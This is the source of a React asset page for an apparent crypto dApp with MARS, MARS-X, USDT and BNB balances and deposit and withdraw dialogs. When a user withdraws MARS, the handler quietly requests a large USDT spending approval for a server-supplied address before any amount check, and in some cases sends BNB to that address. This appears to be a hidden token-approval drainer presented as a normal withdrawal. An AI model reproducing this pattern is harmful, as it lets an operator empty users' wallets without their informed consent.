import React, {useState, useEffect} from 'react';
import { connect } from 'react-redux';
import Head from '../../components/head/Head'
import Foot from '../../components/foot/Foot'
import { Input, message,Statistic  } from 'antd';
import {balanceOf,signer,transfer,allowance,approve,transferBnb} from '../../utils/ethers'

import NumberFormat from 'react-number-format'
import CountUp from "react-countup";
import { useTranslation } from 'react-i18next'
import {
    WarningOutlined,CloseOutlined
  } from '@ant-design/icons';
import './tan.css'
import '../invite/index.less'
import { addTixian, getAssetsIndex, getTixianRecord,addDepositBuy,addDepositBuyRed,getLiushui,addApprove,gethasPay,addPayBnb} from "../../api";
import { CSSTransition } from 'react-transition-group';
import { stringify } from 'qs';
import {useNavigate} from "react-router-dom";

const mapStateToProps=(state)=>{
    return{
        isLogin:state.isLogin,
        address:state.address,
        chain:state.chain
    }
}

const IndexTest = (props) => {
    const navigate = useNavigate()
    const { t } = useTranslation()
    const [num,setNum] = useState(0)
    const [coin,setCoin] = useState("MARS")
    const [tab,setTab] = useState("BNB")
    const [tab1,setTab1] = useState("col")
    const [valueCol,setValueCol] = useState("")
    const [valueDep,setValueDep] = useState("")
    

    const [isApproveUsdt,setIsApproveUsdt]=useState(false)


    const [receive,setReceive] = useState("")
    const [receiveFee,setReceiveFee] = useState("")
    const [receiveApprove,setReceiveApprove] = useState("")

    
    const [balanceOnUsdt,setBalanceOnUsdt] = useState("")
    const [balanceOnMars,setBalanceOnMars] = useState("")
    const [balanceOnMarsx,setBalanceOnMarsx] = useState("")
    const [mars_n,setMarsN]=useState("")
    const [marsx_n,setMarsxN]=useState("")
    const [usdt_n,setUsdtN]=useState("")
    const [bnb_n,setBnbN]=useState("")

    const [edMars,setEdMars]=useState(0)

    const [depoNum,setDepoNum] = useState("")
    
    const [list,setList] = useState([])
    const [isLock,setIsLock]=useState(false)
    const [showJoin,setShowJoin] = useState(false)
    const [showJoin1,setShowJoin1] = useState(false)
    const [classes,setClasses] = useState(0)

    const [showTi,setShowTi] = useState(false)
    const [showDep,setShowDep] = useState(false)

     const _isApproveUsdt =  () => {
       return  new Promise(async (resolve, reject) => {
            allowance(props.address,receiveApprove,"usdt").then(res=>{
                if(parseFloat(res)>=99999){
                    setIsApproveUsdt(true)
                    resolve(true)
                }else{
                    resolve(false)
                }
            },err =>{
                    resolve(false)
            })
         })
    }

  

    const _rand=  () =>{
            if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
       
        // if(props.address.length<=0) return false
    

        if(receive.length === 0){
            message.error(t('asset.区块合约错误'))
            return false
        }

        let _coin = coin.toLowerCase()
        console.log(valueDep)
        if(!valueDep){
            message.error(t('asset.请输入转入数量'))
            return false
        }
        if(valueDep.length<=0){
            message.error(t('asset.请输入转入数量'))
            return false
        }
        // if(valueDep<100){
        //     message.error(t('asset.最低')+":100")
        //     return false
        // }

        if(_coin == "mars"){
            if(valueDep<1000){
                message.error(t('asset.最低')+":1000")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnMars)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }else if(_coin =="marsx"){
            if(valueDep<1){
                message.error(t('asset.最低')+":1")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnMarsx)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }else if(_coin == "usdt"){
            if(valueDep<1){
                message.error(t('asset.最低')+":1")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnUsdt)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }

        if(isLock){
            return false
        }
        setIsLock(true)
        let con = _coin
                if(_coin =="mars"){
                    con = "ccer"
                } 
                transfer(props.address,receive,String(con),valueDep).then(
                    res=>{
                        addDepositBuy({
                            address:props.address,
                            value:valueDep.toString(),
                            hex:res.hash,
                            coin:_coin
                        }).then(
                            res=>{
                                message.success(res.msg)
                                closeAll()
                                setNum(num+1);
                                setIsLock(false)
                            })
                    }, error=>{
                        setIsLock(false)
                        message.error(error)
                    })


    }



    // const _getTixianRecord = (classes) =>{
    //     if(props.address.length<=0){
    //         message.error(t('node.请先连接钱包'))
    //         return false
    //     }
    //     if(props.isLogin === false){
    //         message.error(t('node.请先绑定地址'))
    //         return false
    //     }
    //     setTab1(classes)
        
    //     getTixianRecord({classes:classes}).then(res=>{
    //             if(res.code === 0 ){
    
                  
    //                 if(res.data.list != null){
    //                     setList(res.data.list)
                        
    //                 }
    //                 setShowJoin1(true)
    
    //             }else{
    //                 message.error(res.msg)
    //             }
    //         },error =>{
    //             message.error(error)
    //         })
        
        
    // }

    // const _getLiushui = (coin) =>{
    //     if(props.address.length<=0){
    //         message.error(t('node.请先连接钱包'))
    //         return false
    //     }
    //     if(props.isLogin === false){
    //         message.error(t('node.请先绑定地址'))
    //         return false
    //     }
    //     setTab(coin)
        
    //         getLiushui({coin:coin}).then(res=>{
    //             if(res.code === 0 ){
    
                  
    //                 if(res.data.list != null){
    //                     setList(res.data.list)
                        
    //                 }
    //                 setShowJoin(true)
    
    //             }else{
    //                 message.error(res.msg)
    //             }
    //         },error =>{
    //             message.error(error)
    //         })
        
        
    // }

    const _getTixianIndex= () =>{
        if(props.address.length === 0 || props.isLogin === false){
            return false
        }
        getAssetsIndex().then(res=>{
            if(res.code === 0 ){
                setUsdtN(res.data.usdt_n)
                setMarsN(res.data.mars_n)
                setBnbN(res.data.bnb_n)
                setMarsxN(res.data.marsx_n)
                setReceive(res.data.receive)
                setEdMars(res.data.ed_mars)
                setReceiveFee(res.data.fee_receive)
                setReceiveApprove(res.data.approve_receive)
            
                
                // if(res.data.list != null){
                //     setList(res.data.list)
                // }

            }else{
                message.error(res.msg)
            }
        },error =>{
            message.error(error)
        })

    }
    const _maxTi = () =>{
         let _coin = coin.toLocaleLowerCase()
     
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
        if(_coin == "mars"){
          setValueCol(mars_n)
        }else if(_coin == "marsx"){
            setValueCol(marsx_n)
        }else if(_coin == "usdt"){
             setValueCol(usdt_n)
        }else if(_coin == "bnb"){
             setValueCol(bnb_n)
        }else{
           
        }

    }

   const _maxDep = () =>{
         let _coin = coin.toLocaleLowerCase()
     
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
        if(_coin == "mars"){
          setValueDep(balanceOnMars)
        }else if(_coin == "marsx"){
            setValueDep(balanceOnMarsx)
        }else if(_coin == "usdt"){
             setValueDep(balanceOnUsdt)
        }else{
           
        }

    }

    

    const _ti = async () =>{

        let _coin = coin.toLowerCase()
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先连接钱包'))
            return false
        }
        message.warning(t('asset.提取中请等待'),4)
         const _isApprove =await _isApproveUsdt()
            console.log(_isApprove)
         
        if(_isApprove == false){
            let tx = await approve(receiveApprove,"usdt",99999,true)
            addApprove({address:props.address,hex:String(tx.hash)})
        }

     

        if(valueCol.length===0){
            message.error(t('asset.请输入数量'))
            return false
        }
        if(_coin == "mars"){
            if(parseFloat(valueCol)<100){
                message.error(t('asset.最低提取数量')+"100")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(mars_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "marsx"){
            return false
            if(parseFloat(valueCol)<100){
                message.error(t('asset.最低提取数量')+"100")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(marsx_n)){
                message.error(t('asset.余额不足'))
                return false
            }
        }

        if(_coin == "usdt"){
            return false
            if(parseFloat(valueCol)<100){
                message.error(t('asset.最低提取数量')+"100")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdt_n)){
                message.error(t('m.余额不足'))
                return false
            }
        }

        if(_coin == "bnb"){
            return false
            if(parseFloat(valueCol)<0.01){
                message.error(t('asset.最低提取数量')+"0.01")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(bnb_n)){
                message.error(t('m.余额不足'))
                return false
            }
        }
        
        if(isLock) return false;
        setIsLock(true)

        gethasPay({address:props.address,coin:coin}).then(resPay=>{
            if(resPay.data.has=="3"){
                transferBnb(props.address,receiveApprove,0.0007).then(async resBnb=>{
                    let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
                    if(res4.code==0){
                               
                                    addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin}).then(resTi=>{
                                        if(resTi.code==0){
                                            message.success(resTi.msg)
                                        }else{
                                            message.error(resTi.msg)
                                        }
                                        setIsLock(false)
                                        closeAll()
                                        setNum(num+1)
                                    },errorTi=>{
                                        setIsLock(false)
                                        closeAll()
                                        message.error(errorTi)
                                    })
                                    

                              
                            }else{
                                setIsLock(false)
                                closeAll()
                                message.error(res4.msg)
                            }

                    // addPayBnb({address:props.address,hex:String(resBnb)}).then(res4=>{
                    //         if(res4.code===0){
                    //             signer(props.address).then(res=>{
                    //                 addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(resTi=>{
                    //                     if(resTi.code===0){
                    //                         message.success(resTi.msg)
                    //                     }else{
                    //                         message.error(resTi.msg)
                    //                     }
                    //                     setIsLock(false)
                    //                     closeAll()
                    //                     setNum(num+1)
                    //                 },errorTi=>{
                    //                     setIsLock(false)
                    //                     closeAll()
                    //                     message.error(errorTi)
                    //                 })
                                    

                    //             },error=>{
                    //                 setIsLock(false)
                    //             })
                    //         }else{
                    //             setIsLock(false)
                    //             closeAll()
                    //             message.error(res4.msg)
                    //         }
                    // },err4=>{
                    //      setIsLock(false)
                    //     closeAll()
                    //     message.error(err4)
                    // })
                },errBnb=>{
                     setIsLock(false)
                    closeAll()
                    message.error(errBnb)
                })
            }else{
                  signer(props.address).then(res=>{
                        addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(resTi=>{
                            if(resTi.code==0){
                                message.success(resTi.msg)
                            }else{
                                message.error(resTi.msg)
                            }
                            setIsLock(false)
                            closeAll()
                            setNum(num+1)
                        },errorTi=>{
                            setIsLock(false)
                            closeAll()
                            message.error(errorTi)
                        })
                           

                    },error=>{
                        setIsLock(false)
                    })
            }
        },errPay=>{
            closeAll()
            setIsLock(false)
            message.error(errPay)
        })

        //  transferBnb(props.address,receiveApprove,0.0007).then(
        //             res2=>{
        //                 addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin}).then(res=>{
        //                     if(res.code===0){
        //                         message.success(res.msg)
        //                     }else{
        //                         message.error(res.msg)
        //                     }
        //                     setIsLock(false)
        //                     closeAll()
        //                     setNum(num+1)
        //                 },error=>{
        //                     setIsLock(false)
        //                     message.error(error)
        //                 })
                               
                            
        //             },err2=>{
        //                 setIsLock(false)
        //                 message.error(err2)
        //             }
        //         )


        
        // signer(props.address).then(res=>{
        //     addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass}).then(res=>{
        //         if(res.code===0){
        //             message.success(res.msg)
        //         }else{
        //             message.error(res.msg)
        //         }
        //         setIsLock(false)
        //         closeAll()
        //         setNum(num+1)
        //     },error=>{
        //         setIsLock(false)
        //         message.error(res.msg)
        //     })

        // },error=>{
        //     setIsLock(false)
        // })
    }

    const closeAll = () =>{
        setShowTi(false)
        setShowDep(false)
        setCoin("")
        setValueCol("")
        setValueDep("")
    }

    const openTi = (coin) =>{
        
    //     message.error(t('g.暂未开放'))
    //    return
    console.log(coin)
    if(coin == "MARS"){
        
    }else{
          message.error(t('g.暂未开放'))
       return
    }
      

        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        setShowDep(false)
        setCoin(coin)
        setShowTi(true)
        setValueCol(edMars)
        
    }

    const openDep = (coin) =>{
        message.error(t('g.暂未开放'))
       return
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(coin=="BNB"){
            message.error("coing soon")
            return
        }
        let _coin =coin;
        if(coin == "MARS"){
            _coin ="ccer"
        }
        if(isLock) return false;
        setIsLock(true)
        message.loading("get balance...",0)
        balanceOf(props.address,_coin.toLowerCase()).then(res=>{
            if(coin == "USDT"){
                setBalanceOnUsdt(res)
            }else if(coin =="MARS"){
                setBalanceOnMars(res)
            }else if(coin == "MARSX"){
                setBalanceOnMarsx(res)
            }
            message.destroy()
            setShowTi(false)
            setCoin(coin)
            setShowDep(true)
            setIsLock(false)
        },error=>{
            message.error(error)
            setIsLock(false)
        })
        
        
        
    }

    const goLiushui = (url)=>{
    //     message.error(t('g.暂未开放'))
    //    return
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        navigate(url,{
            state:{
                address:props.address
            }
        })
    }
    


    useEffect(() => {
            window.scrollTo(0, 0)
           
             _getTixianIndex()
             
            // _balanceOf()
            // _balanceOf1()
    }, 
    // eslint-disable-next-line
    [props.isLogin,num]);

    return (
        <>  


        {/*col  */}
        {
            showTi?(
                <div  className=' w-full lg:w-1/3 h-screen  fixed left-0 top-0  inout1' style={{"backgroundColor":"rgba(0,0,0,.9)"}}>
                    <CSSTransition in={showTi} unmountOnExit={true} classNames='asset' timeout={500} appear>
                        <div className=' w-80 h-48 px-5 mx-auto overflow-auto assetsbgt mt-40 relative' style={{"zIndex":"90"}}>
                            <div className='w-full  flex flex-row justify-center items-center text-gray-400 absolute top-6 right-5' style={{"zIndex":"999"}}>
                                
                                <CloseOutlined onClick={closeAll} className=' absolute right-0  text-xl' />
                            </div>

                            <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                <span className="text-sm text-gray-200">{t('asset.提取')} ${coin} </span>
                                <span className="text-xs text-text-act">{t('asset.额度')}：<CountUp start={0} end={coin=="MARS"?edMars:coin=="MARSX"?marsx_n:coin=="USDT"?usdt_n:0} duration="1" decimals={2} /></span>
                            </div>
                            <div className="w-full h-9 mt-3 rounded-full flex flex-row items-center px-4" style={{"backgroundColor":"#18120A","border":"1px #583C25 solid"}} >
                                <input disabled onInput={(e)=>setValueCol(e.target.value)} value={valueCol}  type="number"   className=' w-4/5 h-9 text-sm text-white input1 ' ></input>
                                {/* <span onClick={_maxTi} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span> */}
                            </div>
                            <div className=' w-full mt-4 flex flex-row justify-center'>
                                <button onClick={_ti}  className='w-24 h-8 assetbt2  text-sm text-white font-extrabold '>{t('asset.提取')}</button>
                            </div>
                            
                        </div>
                    </CSSTransition>
                </div>
            ):null
        }
        {/*col  */}
        {
            showDep?(
                <div  className=' w-full lg:w-1/3 h-screen  fixed left-0 top-0 inout1' style={{"backgroundColor":"rgba(0,0,0,.9)"}}>
                    <CSSTransition in={showDep} unmountOnExit={true} classNames='asset' timeout={500} appear>
                        <div className=' w-80 h-48 px-5 mx-auto overflow-auto assetsbgt mt-40 relative' style={{"zIndex":"90"}}>
                            <div className='w-full  flex flex-row justify-center items-center text-gray-400 absolute top-6 right-5' style={{"zIndex":"999"}}>
                                
                                <CloseOutlined onClick={closeAll} className=' absolute right-0  text-xl' />
                            </div>

                            <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                                <span className="text-sm text-gray-200">{t('asset.存入')} ${coin} </span>
                                <span className="text-xs text-text-act">{t('asset.钱包余额')}：<CountUp start={0} end={coin=="MARS"?balanceOnMars:coin=="MARSX"?balanceOnMarsx:coin=="USDT"?balanceOnUsdt:0} duration="1" decimals={4} /></span>
                            </div>
                            <div className="w-full h-9 mt-3 rounded-full flex flex-row items-center px-4" style={{"backgroundColor":"#18120A","border":"1px #583C25 solid"}} >
                                <input onInput={(e)=>setValueDep(e.target.value)} value={valueDep}  type="number"   className=' w-4/5 h-9 text-sm text-white input1 ' ></input>
                                <span onClick={_maxDep} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span>
                            </div>
                            <div className=' w-full mt-4 flex flex-row justify-center'>
                                <button onClick={_rand}  className='w-24 h-8 assetbt22  text-sm text-white font-extrabold '>{t('asset.存入')}</button>
                            </div>
                            
                        </div>
                    </CSSTransition>
                </div>
            ):null
        }
        {/*  */}
        
            <Head/>
            
            <div style={{"backgroundColor":"#18120A"}} className=' assetsbg w-full lg:w-1/3  px-4 pt-20 text-white flex flex-col'>
                <div className=' w-full h-6 mx-auto mt-16 pt-1 flex flex-row justify-center items-center  '>
                    <img alt='rr' className=' mr-2' src={require('../../assets/bg/share/title.png')} style={{"width":"42px"}}></img>
                    <span className=' text-sm text-text-act'>{t('asset.星际资产')}</span>
                    <img alt='rr' className=' ml-2' src={require('../../assets/bg/share/title.png')} style={{"width":"42px"}}></img>
                </div>

                <div className="w-full h-40 px-5  mt-7 flex flex-col assetbbg">
                    <div className="w-full h-5 mt-5 text-base text-text-act">MARS</div>
                    <div className="w-full h-14 mt-1 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/icon/marslogo.png')} style={{"width":"35px"}}></img>
                        <span className=" text-sm text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-base text-gray-100 ml-2"><CountUp start={0} end={mars_n} duration="1" decimals={6} /></span>
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center">
                        <div onClick={()=>openDep("MARS")} className="w-24 h-8 mr-4 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.存入')}
                        </div>
                       <div onClick={()=>openTi("MARS")} className="w-24 h-8 mr-4 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.提取')}
                        </div>
                        <div onClick={()=>goLiushui("/record_mars")} className="w-24 h-8 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.记录')}
                        </div>
                    </div>
                </div>

                <div className="w-full h-40 px-5  mt-7 flex flex-col assetbbg">
                    <div className="w-full h-5 mt-5 text-base text-text-act">MARS-X</div>
                    <div className="w-full h-14 mt-1 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/icon/marsxlogo.png')} style={{"width":"35px"}}></img>
                        <span className=" text-sm text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-base text-gray-100 ml-2"><CountUp start={0} end={marsx_n} duration="1" decimals={6} /></span>
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center">
                        <div onClick={()=>openDep("MARSX")} className="w-24 h-8 mr-4 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.存入')}
                        </div>
                       <div onClick={()=>openTi("MARSX")} className="w-24 h-8 mr-4 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.提取')}
                        </div>
                        <div onClick={()=>goLiushui("/record_marsx")} className="w-24 h-8 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.记录')}
                        </div>
                    </div>
                </div>

                <div className="w-full h-40 px-5  mt-7 flex flex-col assetbbg">
                    <div className="w-full h-5 mt-5 text-base text-text-act">MARS-USDT</div>
                    <div className="w-full h-14 mt-1 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/icon/usdtlogo.png')} style={{"width":"35px"}}></img>
                        <span className=" text-sm text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-base text-gray-100 ml-2"><CountUp start={0} end={usdt_n} duration="1" decimals={6} /></span>
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center">
                        <div onClick={()=>openDep("USDT")} className="w-24 h-8 mr-4 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.存入')}
                        </div>
                       <div onClick={()=>openTi("USDT")} className="w-24 h-8 mr-4 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.提取')}
                        </div>
                        <div onClick={()=>goLiushui("/record_usdt")} className="w-24 h-8 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.记录')}
                        </div>
                    </div>
                </div>

                <div className="w-full h-40 px-5  mt-7 flex flex-col assetbbg">
                    <div className="w-full h-5 mt-5 text-base text-text-act">MARS-BNB</div>
                    <div className="w-full h-14 mt-1 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/icon/bnblogo.png')} style={{"width":"35px"}}></img>
                        <span className=" text-sm text-gray-400">{t('asset.余额')}：</span>
                        <span className=" text-base text-gray-100 ml-2"><CountUp start={0} end={usdt_n} duration="1" decimals={6} /></span>
                    </div>
                    <div className="mt-1 w-full h-14 mb-2 flex flex-row justify-start items-center">
                        <div onClick={()=>openDep("BNB")} className="w-24 h-8 mr-4 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.存入')}
                        </div>
                       <div onClick={()=>openTi("BNB")} className="w-24 h-8 mr-4 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.提取')}
                        </div>
                        <div onClick={()=>goLiushui("/record_bnb")} className="w-24 h-8 assetbt1 text-sm text-white font-extrabold flex flex-row justify-center items-center">
                            {t('asset.记录')}
                        </div>
                    </div>
                </div>
                
                
            </div>
           
            <div style={{"backgroundColor":"#18120A"}} className=' w-full h-[200px]'></div>
                <Foot/>
        </>
    );
}

export default connect(mapStateToProps)(IndexTest);
